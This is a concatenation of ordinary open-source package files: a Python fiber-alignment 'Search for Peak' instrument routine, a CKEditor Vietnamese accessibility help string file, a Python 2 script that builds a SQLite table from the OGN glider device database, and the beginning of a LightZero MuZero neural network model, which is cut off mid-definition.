DIMENSION_NAMES_TWO_STAGES = ['Left X', 'Left Y', 'Right X', 'Right Y']
DIMENSION_NAMES_SINGLE_STAGE = ['X', 'Y']
def __init__(
self,
*args,
mover: Type[MoverNew] = None,
parent=None,
**kwargs
) -> None:
"""Constructor
Parameters
----------
mover : Mover
Reference to the Mover class for Piezo stages.
"""
super().__init__(*args, **kwargs) # calling parent constructor
self._parent = parent
self.name = "SearchForPeak-2DGaussianFit"
self.settings_filename = "PeakSearcher_settings.json"
self.mover = mover
self.logger = logging.getLogger()
# gather all plots for the plotting GUIs
self.plots_left = ObservableList()
self.plots_right = ObservableList()
# chosen instruments for IL measurement
self.instr_laser = None
self.instr_powermeter = None
self.initialized = False
self.logger.info(
'Initialized Search for Peak with method: ' + str(self.name))
@property
def settings_path_full(self):
return get_configuration_file_path(self.settings_filename)
def set_experiment(self, experiment):
"""Helper function to keep all initializations in the right order
This line cannot be included in __init__
"""
self._experiment = experiment
@staticmethod
def _gaussian(xdata, a, mu, sigma, offset):
return a * np.exp(-(xdata - mu) ** 2 / (2 * sigma ** 2)) + offset
@staticmethod
def _gaussian_param_initial_guess(x_data, y_data):
"""
Crudely estimates initial parameters for a gaussian fitting on 2-dimensional data.
"""
a_init = y_data.max() - y_data.min()
# mu_init = np.sum(x_data * y_data) / np.sum(y_data)
mu_init = x_data[np.argmax(y_data)]
# sigma_init = np.sqrt(np.sum(y_data * (x_data - mu_init) ** 2 / np.sum(y_data)))
# assume that sigma spans the sampled interval
sigma_init = x_data.max() - x_data.min()
offset_init = y_data.min()
return [a_init, mu_init, sigma_init, offset_init]
def fit_gaussian(self, x_data, y_data):
"""Fits a gaussian function of four parameters to the given x and y data.
Parameters
----------
x_data : np.ndarray
the set of independent data points
y_data : np.ndarray
the set of dependent data points
Returns
-------
popt: 4-tuple
a (amplitude of gauss peak), mu (mean of gauss), sigma (std dev of gauss), offset (y-axis offset baseline)
perr_std_dev: np.ndarray
a 4-vector giving the estimated std deviations of the parameters, the lower the better
Raises
------
RuntimeError: when the fitting fails to converge.
"""
# make sure the input data is in numpy arrays
x_data = np.array(x_data)
y_data = np.array(y_data)
# we cannot fit on empty vectors
assert len(x_data) > 0
assert len(y_data) > 0
pinit = PeakSearcher._gaussian_param_initial_guess(x_data, y_data)
# define bounds for the fitting parameters
a_bounds = (0, np.inf) # allow only positive gaussians, i.e. hills, not valleys
mu_bounds = (-np.inf, np.inf)
sigma_bounds = (0, np.inf)
offset_bounds = (-np.inf, np.inf)
lower_bounds = (a_bounds[0], mu_bounds[0], sigma_bounds[0], offset_bounds[0])
upper_bounds = (a_bounds[1], mu_bounds[1], sigma_bounds[1], offset_bounds[1])
# fit a gaussian to the data
popt, cov = curve_fit(PeakSearcher._gaussian,
x_data,
y_data,
p0=pinit,
bounds=(lower_bounds, upper_bounds),
ftol=1e-8,
maxfev=10000)
self.logger.debug('Gaussian Fit:')
self.logger.debug('a -- mu -- sigma -- offset')
self.logger.debug(str(popt))
perr_std_dev = np.sqrt(np.diag(cov))
return popt, perr_std_dev
@staticmethod
def get_default_parameter():
return {
'Laser wavelength': MeasParamInt(value=1550, unit='nm'),
'Laser power': MeasParamFloat(value=0.0, unit='dBm'),
'Power Meter range': MeasParamFloat(value=0.0, unit='dBm'),
'Search radius': MeasParamFloat(value=5.0, unit='um'),
'SfP type': MeasParamList(options=['stepped SfP', 'swept SfP (FA & N7744a PM models only)']),
'(stepped SfP only) Search step size': MeasParamFloat(value=0.5, unit='um'),
'(stepped SfP only) Search fiber stabilization time': MeasParamInt(value=200, unit='ms'),
'(swept SfP only) Search time': MeasParamFloat(value=2.0, unit='s'),
'(swept SfP only) Number of points': MeasParamInt(value=500)
}
@staticmethod
def get_wanted_instrument():
return ['Laser', 'Power Meter']
def search_for_peak(self):
"""Main Search For Peak routine
Uses a 2D gaussian fit for all four dimensions.
Returns
-------
dict
A dict containing the parameters used for the SFP, the estimated through power,
and gaussian fitting information.
"""
# double check if mover is actually enabled
if self.mover.left_calibration is None and self.mover.right_calibration is None:
raise RuntimeError(
"The Search for Peak requires at least one left or right stage configured.")
if self.mover.left_calibration and self.mover.right_calibration:
self._dimension_names = self.DIMENSION_NAMES_TWO_STAGES
else:
self._dimension_names = self.DIMENSION_NAMES_SINGLE_STAGE
# load laser and powermeter
self.instr_powermeter = self.get_instrument('Power Meter')
self.instr_laser = self.get_instrument('Laser')
# double check if instruments are initialized, otherwise throw error
if self.instr_powermeter is None:
raise RuntimeError('Search for Peak Power Meter not yet defined!')
if self.instr_laser is None:
raise RuntimeError('Search for Peak Laser not yet defined!')
# initialize plotting
self.plots_left.clear()
self.plots_right.clear()
# open connection to instruments
self.instr_laser.open()
self.instr_powermeter.open()
self.logger.debug('Executing Search for Peak with the following parameters: {:s}'.format(
"\n".join([str(name) + " = " + str(param.value) + " " + str(param.unit) for name, param in
self.parameters.items()])
))
# setup results dictionary and save all parameters
results = {
'name': self.name,
'parameter': {},
'start location': None,
'start through power': None,
'optimized location': None,
'optimized through power': None,
'fitting information': {}
}
for param_name, cfg_param in self.parameters.items():
results['parameter'][param_name] = str(cfg_param.value) + str(cfg_param.unit)
# send user specified parameters to instruments
self.instr_laser.wavelength = self.parameters['Laser wavelength'].value
self.instr_laser.power = self.parameters['Laser power'].value
self.instr_powermeter.unit = 'dBm'
self.instr_powermeter.wavelength = self.parameters['Laser wavelength'].value
self.instr_powermeter.range = self.parameters['Power Meter range'].value
# get stage speed for later reference
v0 = self.mover.speed_xy
acc0 = self.mover.acceleration_xy
# stop all previous logging
self.instr_powermeter.logging_stop()
# switch on laser
with self.instr_laser:
with self.mover.set_stages_coordinate_system(CoordinateSystem.STAGE):
# read parameters for SFP
sfp_type = self.parameters.get('SfP type').value
radius_us = self.parameters.get('Search radius').value
# parameters specifically for stepped sfp
stepsize_us = self.parameters['(stepped SfP only) Search step size'].value
pause_time_ms = self.parameters['(stepped SfP only) Search fiber stabilization time'].value
# parameters specifically for swept SfP
t_sweep = self.parameters.get('(swept SfP only) Search time').value
no_points = int(self.parameters.get('(swept SfP only) Number of points').value)
# define parameters
# the sweep velocity is the distance passed (twice the search
# radius) divided by the sweep time
v_sweep_ums = 2 * radius_us / t_sweep
avg_time = t_sweep / float(no_points)
unit = 'dBm'
# find the current positions of the stages as starting point for
# SFP
_left_start_coordinates = []
_right_start_coordinates = []
if self.mover.left_calibration:
_left_start_coordinates = self.mover.left_calibration.get_position().to_list()[
:2]
if self.mover.right_calibration:
_right_start_coordinates = self.mover.right_calibration.get_position().to_list()[
:2]
start_coordinates = _left_start_coordinates + _right_start_coordinates
current_coordinates = start_coordinates.copy()
self.logger.debug(f"Start Position: {start_coordinates}")
estimated_through_power = -99.0
# get start statistics
results['start location'] = start_coordinates.copy()
results['start through power'] = self.instr_powermeter.power
# do sweep for every dimension
# color cycle strings for matplotlib
color_strings = ['C' + str(i) for i in range(10)]
for dimidx, p_start in enumerate(start_coordinates):
dimension_name = self._dimension_names[dimidx]
# create new plotting dataset for measurement
meas_plot = PlotData(ObservableList(), ObservableList(),
'scatter', color=color_strings[dimidx])
fit_plot = PlotData(ObservableList(), ObservableList(),
color=color_strings[dimidx], label=dimension_name)
opt_pos_plot = PlotData(ObservableList(), ObservableList(),
marker='x', markersize=10, color=color_strings[dimidx])
if dimidx < len(start_coordinates) / 2:
self.plots_left.append(meas_plot)
self.plots_left.append(fit_plot)
self.plots_left.append(opt_pos_plot)
else:
self.plots_right.append(meas_plot)
self.plots_right.append(fit_plot)
self.plots_right.append(opt_pos_plot)
# differentiate between the two types of SfP
if sfp_type == 'swept SfP (FA & N7744a PM models only)':
allowed_pm_classes = ['PowerMeterN7744A', 'PowerMeterSimulator']
# complain if user selects a Power Meter that is not
# compatible with new Search for Peak
if self.instr_powermeter.__class__.__name__ not in allowed_pm_classes:
raise RuntimeError(
'swept SfP is only compatible with Keysight N7744A PM models, not {}'.format(
self.instr_powermeter.__class__.__name__))
# move stage to initial position and setup
current_coordinates[dimidx] = p_start - radius_us
self._move_stages_absolute(current_coordinates)
# setup power meter logging feature
# autogain attribute exists only for N7744A, no effect on
# other
self.instr_powermeter.autogain = False
self.instr_powermeter.range = self.parameters['Power Meter range'].value
self.instr_powermeter.unit = unit
self.instr_powermeter.averagetime = avg_time
self.instr_powermeter.logging_setup(
n_measurement_points=no_points,
triggered=True,
trigger_each_meas_separately=False)
self.instr_powermeter.logging_start()
# take a tiny break
time.sleep(0.1)
current_coordinates[dimidx] = p_start + radius_us
# empirically determined acceleration
acc_umps2 = 50
self.mover.speed_xy = v_sweep_ums
self.mover.acceleration_xy = acc_umps2
# start logging at powermeter
self.instr_powermeter.trigger()
# mover_time_lower = time.time()
self._move_stages_absolute(current_coordinates)
# mover_time_upper = time.time()
while self.instr_powermeter.logging_busy():
time.sleep(0.1)
pm_data = self.instr_powermeter.logging_get_data()
# pay attention to unit here
IL_meas = pm_data
# calculate the estimated movement profile, given constant
# acceleration of the stages
_, d_range, _, _ = trapezoidal_velocity_profile_by_integration(start_position_m=-radius_us,
stop_position_m=radius_us,
max_speed_mps=v_sweep_ums,
const_acceleration_mps2=acc_umps2,
n_output_points=len(IL_meas))
# plot it
meas_plot.x = d_range
meas_plot.y = IL_meas
elif sfp_type == 'stepped SfP':
# create range of N measurement points from x-Delta to
# x+Delta
d_range = np.arange(-radius_us, radius_us +
stepsize_us, stepsize_us)
# go through all measurement points for this coordinate and
# record IL
IL_meas = np.empty(len(d_range))
for measidx, d_current in enumerate(d_range):
# move stages to currently probed coordinate
current_coordinates[dimidx] = d_current + p_start
self._move_stages_absolute(current_coordinates)
# take a break to let fiber-vibration die off
time.sleep(pause_time_ms / 1000)
# take IL measurement
loss = self.instr_powermeter.power
# save data
# do not trigger plot update just yet
meas_plot.x.extend([d_current])
meas_plot.y.append(loss)
IL_meas[measidx] = loss
else:
raise ValueError(
'invalid SfP type given! Options are `stepped SfP` or `swept SfP`.')
self.logger.debug('SFP results:')
self.logger.debug('coordinates:' + str(d_range))
self.logger.debug('IL: ' + str(IL_meas))
# default assignments before SFP decision
optimized_target = 0
popt = None
perr_std_dev = None
fit_msg = None
sfp_msg = None
# 1st decision: did the power meter always return useful data?
if ~np.all(np.isfinite(IL_meas)):
sfp_msg = f'SFP failed on dimension {dimension_name} because not all measured IL values are finite.' + \
' Change of power meter range required. Moving back to start point.'
self.logger.warning(sfp_msg)
else:
# 2nd decision: fit the gauss and see if it works
try:
popt, perr_std_dev = self.fit_gaussian(
d_range, IL_meas)
fit_msg = "Gauss fitting successful."
except RuntimeError: # thrown from scipy optimizer if algorithm did not converge
# if convergence fails, we estimate the parameters crudly, i.e. just get the point with
# maximum transmission
popt = PeakSearcher._gaussian_param_initial_guess(
d_range, IL_meas)
fit_msg = "Gauss fitting did not converge. Using point with maximum transmission."
self.logger.warning(fit_msg)
# 3rd decision: judge feasibility of gaussian fit
a_best, d_best = popt[0:2]
if abs(d_best) > 1.5 * radius_us:
sfp_msg = 'Movement would be more than 1.5x search radius. Moving back to start point.'
self.logger.warning(sfp_msg)
else:
optimized_target = d_best
sfp_msg = f'Moving to optimized fiber location.'
# plot the gaussian, if gaussian was successfully fitted
if perr_std_dev is not None:
# interpolate between the fitted values to get a nice
# smooth line
d_range_highres = np.linspace(
d_range.min(), d_range.max(), num=len(
meas_plot.x) * 5)
IL_fit_fctn = PeakSearcher._gaussian(
d_range_highres, *popt)
# plot fit data
fit_plot.x.extend(d_range_highres)
fit_plot.y.extend(IL_fit_fctn[0:-1])
# trigger plot update
fit_plot.y.append(IL_fit_fctn[-1])
# mark the point where we move to in any case
estimated_through_power = self._gaussian(
optimized_target, *popt)
# do not trigger plot update just yet
opt_pos_plot.x.extend([optimized_target])
opt_pos_plot.y.append(estimated_through_power)
# inform user and store the fitting information
self.logger.debug(
f"Search for peak for dimension {dimension_name} finished. "
f"Fitter message: {fit_msg} -- SFP decision: {sfp_msg} "
f"Moving to location: {optimized_target:.3f}um with estimated through power"
f" of {estimated_through_power:.1f}dBm.")
results['fitting information'][dimension_name] = {
'optimized parameters': list(popt) if popt is not None else None,
'parameter estimation error std dev': list(perr_std_dev) if perr_std_dev is not None else None,
'fitter message': str(fit_msg),
'sfp decision': str(sfp_msg)}
# reset speed and acceleration to original
self.mover.speed_xy = v0
self.mover.acceleration_xy = acc0
# final move of fiber in this dimensions final decision
current_coordinates[dimidx] = optimized_target + p_start
self._move_stages_absolute(current_coordinates)
# close instruments
self.instr_laser.close()
self.instr_powermeter.close()
# save final result to log
loc_str = " x ".join(["{:.3f}um".format(p)
for p in current_coordinates])
self.logger.info(
f"Search for peak finished: maximum estimated output power of {estimated_through_power:.1f}dBm"
f" at {loc_str:s}.")
# save end result and return
results['optimized location'] = current_coordinates.copy()
results['optimized through power'] = estimated_through_power
return results
def _move_stages_absolute(self, coordinates: list):
with self.mover.set_stages_coordinate_system(CoordinateSystem.STAGE):
if self.mover.left_calibration and self.mover.right_calibration:
leftz = self.mover.left_calibration.get_position().z
rightz = self.mover.right_calibration.get_position().z
assert len(coordinates) == 4
self.mover.left_calibration.move_absolute(
StageCoordinate.from_list(coordinates[:2] + [leftz]))
self.mover.right_calibration.move_absolute(
StageCoordinate.from_list(coordinates[2:] + [rightz]))
elif self.mover.left_calibration:
leftz = self.mover.left_calibration.get_position().z
assert len(coordinates) == 2
self.mover.left_calibration.move_absolute(
StageCoordinate.from_list(coordinates + [leftz]))
elif self.mover.right_calibration:
rightz = self.mover.right_calibration.get_position().z
assert len(coordinates) == 2
self.mover.right_calibration.move_absolute(
StageCoordinate.from_list(coordinates + [rightz]))
else:
raise RuntimeError()
def update_params_from_savefile(self):
if not os.path.isfile(self.settings_path_full):
self.logger.info(
"SFP Parameter save file at {:s} not found. Using default parameters.".format(
self.settings_path_full))
return
with open(self.settings_path_full, 'r') as json_file:
data = json.loads(json_file.read())
for parameter_name in data:
self.parameters[parameter_name].value = data[parameter_name]
self.logger.info(
"SearchForPeak parameters loaded from file: {:s}.".format(
self.settings_path_full))
def algorithm(self, device, data, instruments, parameters):
raise NotImplementedError() | PypiClean |
/Django-Pizza-16.10.1.tar.gz/Django-Pizza-16.10.1/pizza/kitchen_sink/static/ks/ckeditor/plugins/a11yhelp/dialogs/lang/vi.js | /*
Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.md or http://ckeditor.com/license
*/
CKEDITOR.plugins.setLang("a11yhelp","vi",{title:"Hướng dẫn trợ năng",contents:"Nội dung Hỗ trợ. Nhấn ESC để đóng hộp thoại.",legend:[{name:"Chung",items:[{name:"Thanh công cụ soạn thảo",legend:"Nhấn ${toolbarFocus} để điều hướng đến thanh công cụ. Nhấn TAB và SHIFT-TAB để chuyển đến nhóm thanh công cụ khác. Nhấn MŨI TÊN PHẢI hoặc MŨI TÊN TRÁI để chuyển sang nút khác trên thanh công cụ. Nhấn PHÍM CÁCH hoặc ENTER để kích hoạt nút trên thanh công cụ."},{name:"Hộp thoại Biên t",legend:"Bên trong một hộp thoại, nhấn TAB để chuyển sang trường tiếp theo, nhấn SHIFT + TAB để quay lại trường phía trước, nhấn ENTER để chấp nhận, nhấn ESC để đóng hộp thoại. Đối với các hộp thoại có nhiều tab, nhấn ALT + F10 để chuyển đến danh sách các tab. Sau đó nhấn TAB hoặc MŨI TÊN SANG PHẢI để chuyển sang tab tiếp theo. Nhấn SHIFT + TAB hoặc MŨI TÊN SANG TRÁI để chuyển sang tab trước đó. Nhấn DẤU CÁCH hoặc ENTER để chọn tab."},
{name:"Trình đơn Ngữ cảnh cBộ soạn thảo",legend:"Nhấn ${contextMenu} hoặc PHÍM ỨNG DỤNG để mở thực đơn ngữ cảnh. Sau đó nhấn TAB hoặc MŨI TÊN XUỐNG để di chuyển đến tuỳ chọn tiếp theo của thực đơn. Nhấn SHIFT+TAB hoặc MŨI TÊN LÊN để quay lại tuỳ chọn trước. Nhấn DẤU CÁCH hoặc ENTER để chọn tuỳ chọn của thực đơn. Nhấn DẤU CÁCH hoặc ENTER hoặc MŨI TÊN SANG PHẢI để mở thực đơn con của tuỳ chọn hiện tại. Nhấn ESC hoặc MŨI TÊN SANG TRÁI để quay trở lại thực đơn gốc. Nhấn ESC để đóng thực đơn ngữ cảnh."},
{name:"Hộp danh sách trình biên tập",legend:"Trong một danh sách chọn, di chuyển đối tượng tiếp theo với phím Tab hoặc phím mũi tên hướng xuống. Di chuyển đến đối tượng trước đó bằng cách nhấn tổ hợp phím Shift+Tab hoặc mũi tên hướng lên. Phím khoảng cách hoặc phím Enter để chọn các tùy chọn trong danh sách. Nhấn phím Esc để đóng lại danh sách chọn."},{name:"Thanh đường dẫn các đối tượng",legend:"Nhấn ${elementsPathFocus} để điều hướng các đối tượng trong thanh đường dẫn. Di chuyển đến đối tượng tiếp theo bằng phím Tab hoặc phím mũi tên bên phải. Di chuyển đến đối tượng trước đó bằng tổ hợp phím Shift+Tab hoặc phím mũi tên bên trái. Nhấn phím khoảng cách hoặc Enter để chọn đối tượng trong trình soạn thảo."}]},
{name:"Lệnh",items:[{name:"Làm lại lện",legend:"Ấn ${undo}"},{name:"Làm lại lệnh",legend:"Ấn ${redo}"},{name:"Lệnh in đậm",legend:"Ấn ${bold}"},{name:"Lệnh in nghiêng",legend:"Ấn ${italic}"},{name:"Lệnh gạch dưới",legend:"Ấn ${underline}"},{name:"Lệnh liên kết",legend:"Nhấn ${link}"},{name:"Lệnh hiển thị thanh công cụ",legend:"Nhấn${toolbarCollapse}"},{name:"Truy cập đến lệnh tập trung vào khoảng cách trước đó",legend:"Ấn ${accessPreviousSpace} để truy cập đến phần tập trung khoảng cách sau phần còn sót lại của khoảng cách gần nhất vốn không tác động đến được , thí dụ: hai yếu tố điều chỉnh HR. Lặp lại các phím kết họep này để vươn đến phần khoảng cách."},
{name:"Truy cập phần đối tượng lệnh khoảng trống",legend:"Ấn ${accessNextSpace} để truy cập đến phần tập trung khoảng cách sau phần còn sót lại của khoảng cách gần nhất vốn không tác động đến được , thí dụ: hai yếu tố điều chỉnh HR. Lặp lại các phím kết họep này để vươn đến phần khoảng cách."},{name:"Trợ giúp liên quan",legend:"Nhấn ${a11yHelp}"}]}]}); | PypiClean |
/OGN_Flogger-0.3.2a14.tar.gz/OGN_Flogger-0.3.2a14/src/flogger_OGN_db.py | import string
import requests
import sqlite3
import time
import flogger_settings
#import flogger_OGN_db
# import unicodedata
def ogndb (ognurl, cursor, flarmdb, flarm_data, settings):
#
#-----------------------------------------------------------------
# This function reads the file of Flarm units registered on OGN and
# uses this to build the flarm_db.
# It takes data from units which are registered for aircraft that are to be logged
#
# Various options exist for accessing the OGN db in different formats
# Simple basic data:
# "http://ddb.glidernet.org/download"
# Basic data plus field for "Aircraft Type"
# "http://ddb.glidernet.org/download/?t=1!
# In a flarmnet-compatible format
# "http://ddb.glidernet.org/download/download-fln.php"
#
# Format is:
# DEVICE_TYPE(0),DEVICE_ID(1),AIRCRAFT_MODEL(2),REGISTRATION(3),CN(4),TRACKED(5),IDENTIFIED(6),AIRCRAFT_TYPE(7)
#
# Aircraft Type values (hard coded for now):
# 1 => 'Gliders/motoGliders',
# 2 => 'Planes',
# 3 => 'Ultralights',
# 4 => 'Helicopters',
# 5 => 'Drones/UAV',
# 6 => 'Others',
#-----------------------------------------------------------------
#
try:
print "flogger_OGN_db.py: Create flarm_db table"
cursor.execute('''CREATE TABLE IF NOT EXISTS
flarm_db(id INTEGER PRIMARY KEY, type TEXT, flarm_id TEXT, airport STRING, aircraft_model TEXT, registration TEXT, radio TEXT, aircraft_type TEXT)''')
print "flarm_db table created"
except Exception as e:
# Roll back any change if something goes wrong
print "Failed to create flarm_db"
# dbflarm.rollback()
# raise e
try:
print "OGN flarm db is at http://ddb.glidernet.org/download"
ogn_db = settings.FLOGGER_OGN_DB_URL
print "settings.FLOGGER_OGN_DB_URL is: ", settings.FLOGGER_OGN_DB_URL
r = requests.get(ogn_db)
print "requests.get(ogn_db) with: ", settings.FLOGGER_OGN_DB_URL
except Exception as e:
print "Failed to connect to OGN db, reason: %s. Exit" % (e)
# exit()
print "OGN db accessed"
data = r.content
# print "OGN content is: ", data[0], data[1], data[2]
lines = data.split("\n")
# print "OGN split is: ", lines
i = 1
for line in lines:
if i == 1:
i += 1
continue # Discard first line
# print "Line ", i, " is: ", line
if line == "":
# Seems to be a blank line at end
continue # Discard last line
line = line.replace("'", "") # Remove all "'" characters
line = line.replace("\r", "") # Remove "\r" at end of line in last field
fields = line.split(",") # Split line into fields on comma boundaries then remove any quote marks
# print "Fields: ", fields
# DEVICE_TYPE(0),DEVICE_ID(1),AIRCRAFT_MODEL(2),REGISTRATION(3),CN(4),TRACKED(5),IDENTIFIED(6),AIRCRAFT_TYPE(7)
nf0 = fields[0] # Device Type: - ICAO (I) - ICAO type address (in practice FLARM device with assigned ICAO address)
# - FLARM (F) - obvious (flarm "hardware" id)
# - OGN (O) - used for OGN trackers
nf1 = fields[1] # Flarm ID
nf2 = fields[2] # Aircraft Model
nf3 = fields[3] # Aircraft Registration
nf4 = fields[4] # CN
nf5 = fields[5] # Tracked
nf6 = fields[5] # Identified
nf7 = fields[7] # Aircraft Type
# print "Line: ", i, " Fields: ", nf1, " ", nf0, " ", nf3
if settings.FLOGGER_FLEET_LIST.has_key(nf3):
airport = settings.FLOGGER_AIRFIELD_NAME
else:
airport = "OTHER"
# if int(nf7) > 2:
# if int(nf7) > 3:
# Type 2 is 'Plane', Type 3 is 'Ultralight'
# print "Ignore Aircraft type is: ", nf7
# continue
# elif "n" in settings.FLOGGER_LOG_TUGS or "N" in settings.FLOGGER_LOG_TUGS and int(nf7) == 2:
# print "Ignore tugs: ", nf7
# continue
Registration = nf3
aircraft_type = 0
try:
aircraft_type_val = settings.FLOGGER_FLEET_LIST[Registration]
if aircraft_type_val >= 1 and aircraft_type_val < 100:
aircraft_type = 1
if aircraft_type_val >= 100 and aircraft_type_val < 200:
aircraft_type = 2
if aircraft_type_val >= 200 and aircraft_type_val < 300:
aircraft_type = 1
# print "Fleet list aircraft: ", Registration, " Type: ", str(aircraft_type)
except:
# pass
aircraft_type = nf7
# print "Aircraft not in fleet list: ", Registration, " Type: ", str(aircraft_type)
# if type(Registration) == 'ascii':
# pass
# else:
# print "Non ascii in: ", Registration
# Registration = Registration.encode('ascii','ignore')
# print "After encode: ", Registration
aircraft_type = str(aircraft_type)
try:
cursor.execute('''INSERT INTO flarm_db(type, flarm_id, airport, aircraft_model, registration, aircraft_type)
VALUES(:type, :flarm_id, :airport, :aircraft_model, :registration, :aircraft_type)''',
# {'type': nf0, 'flarm_id': nf1, 'airport': settings.FLOGGER_AIRFIELD_NAME, 'type': nf0, 'registration': nf3})
# {'type': nf0, 'flarm_id': nf1, 'airport': airport, 'aircraft_model': nf2, 'registration': nf3, 'aircraft_type': nf7})
{'type': nf0, 'flarm_id': nf1, 'airport': airport, 'aircraft_model': nf2, 'registration': nf3, 'aircraft_type': aircraft_type})
except Exception as e:
print "Flarm_db insert failed. Reason: %s Aircraft: %s Flarm_ID: %s" % (e, Registration, nf1)
i += 1
flarmdb.commit()
return True
# exit()
# print "First line from OGN data is : ", val
#db = sqlite3.connect(settings.FLOGGER_DB_NAME)
#cursor = db.cursor() # Get a cursor object
#f = open(settings.FLOGGER_DB_SCHEMA, 'rt') # Open the db schema file for reading
#schema = f.read()
#cursor.executescript(schema) # Build flogger db from schema
#print "End of building db: ", settings.FLOGGER_DB_NAME, " using schema: ", settings.FLOGGER_DB_SCHEMA
#
#-----------------------------------------------------------------
# Build local database from OGN of aircraft
#-----------------------------------------------------------------
#
#print "Start build OGN DB: Test"
#t1 = time.time()
#if ogndb("http://ddb.glidernet.org/download", cursor, db, "flarm_data") == True:
# print "OGN db built"
#else:
# print "OGN db build failed, exit"
#t2 = time.time()
#print "End build OGN DB in ", t2 - t1 , " seconds" | PypiClean |
/LightZero-0.0.1-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl/lzero/model/muzero_model.py | from typing import Optional, Tuple
import math
import torch
import torch.nn as nn
from ding.torch_utils import MLP, ResBlock
from ding.utils import MODEL_REGISTRY, SequenceType
from .common import MZNetworkOutput, RepresentationNetwork, PredictionNetwork
from .utils import renormalize, get_params_mean, get_dynamic_mean, get_reward_mean
# use ModelRegistry to register the model, for more details about ModelRegistry, please refer to DI-engine's document.
@MODEL_REGISTRY.register('MuZeroModel')
class MuZeroModel(nn.Module):
def __init__(
self,
observation_shape: SequenceType = (12, 96, 96),
action_space_size: int = 6,
num_res_blocks: int = 1,
num_channels: int = 64,
reward_head_channels: int = 16,
value_head_channels: int = 16,
policy_head_channels: int = 16,
fc_reward_layers: SequenceType = [32],
fc_value_layers: SequenceType = [32],
fc_policy_layers: SequenceType = [32],
reward_support_size: int = 601,
value_support_size: int = 601,
proj_hid: int = 1024,
proj_out: int = 1024,
pred_hid: int = 512,
pred_out: int = 1024,
self_supervised_learning_loss: bool = False,
categorical_distribution: bool = True,
activation: nn.Module = nn.ReLU(inplace=True),
last_linear_layer_init_zero: bool = True,
state_norm: bool = False,
downsample: bool = False,
*args,
**kwargs
):
"""
Overview:
The definition of the neural network model used in MuZero.
MuZero model which consists of a representation network, a dynamics network and a prediction network.
The networks are build on convolution residual blocks and fully connected layers.
Arguments:
- observation_shape (:obj:`SequenceType`): Observation space shape, e.g. [C, W, H]=[12, 96, 96] for Atari.
- action_space_size: (:obj:`int`): Action space size, usually an integer number for discrete action space.
- num_res_blocks (:obj:`int`): The number of res blocks in AlphaZero model.
- num_channels (:obj:`int`): The channels of hidden states.
- reward_head_channels (:obj:`int`): The channels of reward head.
- value_head_channels (:obj:`int`): The channels of value head.
- policy_head_channels (:obj:`int`): The channels of policy head.
- fc_reward_layers (:obj:`SequenceType`): The number of hidden layers of the reward head (MLP head).
- fc_value_layers (:obj:`SequenceType`): The number of hidden layers used in value head (MLP head).
- fc_policy_layers (:obj:`SequenceType`): The number of hidden layers used in policy head (MLP head).
- reward_support_size (:obj:`int`): The size of categorical reward output
- value_support_size (:obj:`int`): The size of categorical value output.
- proj_hid (:obj:`int`): The size of projection hidden layer.
- proj_out (:obj:`int`): The size of projection output layer.
- pred_hid (:obj:`int`): The size of prediction hidden layer.
- pred_out (:obj:`int`): The size of prediction output layer.
- self_supervised_learning_loss (:obj:`bool`): Whether to use self_supervised_learning related networks \
in MuZero model, default set it to False.
- categorical_distribution (:obj:`bool`): Whether to use discrete support to represent categorical \
distribution for value and reward.
- activation (:obj:`Optional[nn.Module]`): Activation function used in network, which often use in-place \
operation to speedup, e.g. ReLU(inplace=True).
- last_linear_layer_init_zero (:obj:`bool`): Whether to use zero initialization for the last layer of \
dynamics/prediction mlp, default set it to True.
- state_norm (:obj:`bool`): Whether to use normalization for hidden states, default set it to False.
- downsample (:obj:`bool`): Whether to do downsampling for observations in ``representation_network``, \
defaults to True. This option is often used in video games like Atari. In board games like go, \
we don't need this module.
"""
super(MuZeroModel, self).__init__()
if isinstance(observation_shape, int) or len(observation_shape) == 1:
# for vector obs input, e.g. classical control ad box2d environments
# to be compatible with LightZero model/policy, transform to shape: [C, W, H]
observation_shape = [1, observation_shape, 1]
self.categorical_distribution = categorical_distribution
if self.categorical_distribution:
self.reward_support_size = reward_support_size
self.value_support_size = value_support_size
else:
self.reward_support_size = 1
self.value_support_size = 1
self.action_space_size = action_space_size
self.proj_hid = proj_hid
self.proj_out = proj_out
self.pred_hid = pred_hid
self.pred_out = pred_out
self.self_supervised_learning_loss = self_supervised_learning_loss
self.last_linear_layer_init_zero = last_linear_layer_init_zero
self.state_norm = state_norm
self.downsample = downsample
flatten_output_size_for_reward_head = (
(reward_head_channels * math.ceil(observation_shape[1] / 16) *
math.ceil(observation_shape[2] / 16)) if downsample else
(reward_head_channels * observation_shape[1] * observation_shape[2])
)
flatten_output_size_for_value_head = (
(value_head_channels * math.ceil(observation_shape[1] / 16) *
math.ceil(observation_shape[2] / 16)) if downsample else
(value_head_channels * observation_shape[1] * observation_shape[2])
)
flatten_output_size_for_policy_head = (
(policy_head_channels * math.ceil(observation_shape[1] / 16) *
math.ceil(observation_shape[2] / 16)) if downsample else
(policy_head_channels * observation_shape[1] * observation_shape[2])
)
self.representation_network = RepresentationNetwork(
observation_shape,
num_res_blocks,
num_channels,
downsample,
)
self.dynamics_network = DynamicsNetwork(
num_res_blocks,
num_channels + 1,
reward_head_channels,
fc_reward_layers,
self.reward_support_size,
flatten_output_size_for_reward_head,
last_linear_layer_init_zero=self.last_linear_layer_init_zero,
)
self.prediction_network = PredictionNetwork(
action_space_size,
num_res_blocks,
num_channels,
value_head_channels,
policy_head_channels,
fc_value_layers,
fc_policy_layers,
self.value_support_size,
flatten_output_size_for_value_head,
flatten_output_size_for_policy_head,
last_linear_layer_init_zero=self.last_linear_layer_init_zero,
)
if self.self_supervised_learning_loss:
# projection used in EfficientZero
if self.downsample:
# In Atari, if the observation_shape is set to (12, 96, 96), which indicates the original shape of
# (3,96,96), and frame_stack_num is 4. Due to downsample, the encoding of observation (latent_state) is
# (64, 96/16, 96/16), where 64 is the number of channels, 96/16 is the size of the latent state. Thus,
# self.projection_input_dim = 64 * 96/16 * 96/16 = 64*6*6 = 2304
ceil_size = math.ceil(observation_shape[1] / 16) * math.ceil(observation_shape[2] / 16)
self.projection_input_dim = num_channels * ceil_size
else:
self.projection_input_dim = num_channels * observation_shape[1] * observation_shape[2]
self.projection = nn.Sequential(
nn.Linear(self.projection_input_dim, self.proj_hid), nn.BatchNorm1d(self.proj_hid), activation,
nn.Linear(self.proj_hid, self.proj_hid), nn.BatchNorm1d(self.proj_hid), activation,
nn.Linear(self.proj_hid, self.proj_out), nn.BatchNorm1d(self.proj_out)
)
